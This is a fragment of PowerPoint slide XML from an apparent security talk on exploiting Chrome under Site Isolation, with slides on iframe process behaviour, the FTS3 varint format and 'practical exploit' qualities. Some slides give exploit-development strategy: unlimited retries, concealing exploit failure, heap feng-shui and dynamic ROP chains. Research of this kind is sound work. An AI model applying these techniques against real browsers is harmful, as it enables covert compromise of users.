            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist5.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6634065" y="4674637"/>
            <a:ext cx="5243804" cy="13436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2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if… an iframe dies?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does the parent frame die also?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2597851908"/>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https://blog.exodusintel.com/wp-content/uploads/2019/01/site_isolation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171" y="551445"/>
            <a:ext cx="11381368" cy="4804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488674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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3281200"/>
            <a:ext cx="10515600" cy="1458751"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="8000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1E240</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469363" y="4553331"/>
            <a:ext cx="3461657" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hex</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1315006122"/>
      </p:ext>
    </p:extLst>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https://blog.exodusintel.com/wp-content/uploads/2019/01/site_isolation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3501" y="298582"/>
            <a:ext cx="6030621" cy="62547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4552529"/>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https://blog.exodusintel.com/wp-content/uploads/2019/01/site_isolation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7421" y="1466298"/>
            <a:ext cx="8246094" cy="3857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2648505"/>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benefits of Site Isolation for an exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Unlimited amount of Exploit retry attempts</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Concealment of exploit failure</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Increase Heap-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Fengshui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> stability</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Process continuation unnecessary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2902342021"/>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354568" y="37324"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="sploit_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87600" y="0"/>
            <a:ext cx="7416800" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33289919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016621" y="2269866"/>
            <a:ext cx="5175380" cy="2698926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Improving Speed and Reliability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="ìì¤ ì´ë¯¸ì§ ë³´ê¸°"/>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44418" y="0"/>
            <a:ext cx="10287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0157854"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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4 elements for a Practical Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Speed</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Reliability</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Portability</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a:t>Imperceptibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3639786916"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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4 elements for a Practical Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Speed</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Reliability</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Portability</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a:t>Imperceptibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="4376057"/>
            <a:ext cx="10515600"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> everything offset related, Build ROP chain dynamically, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
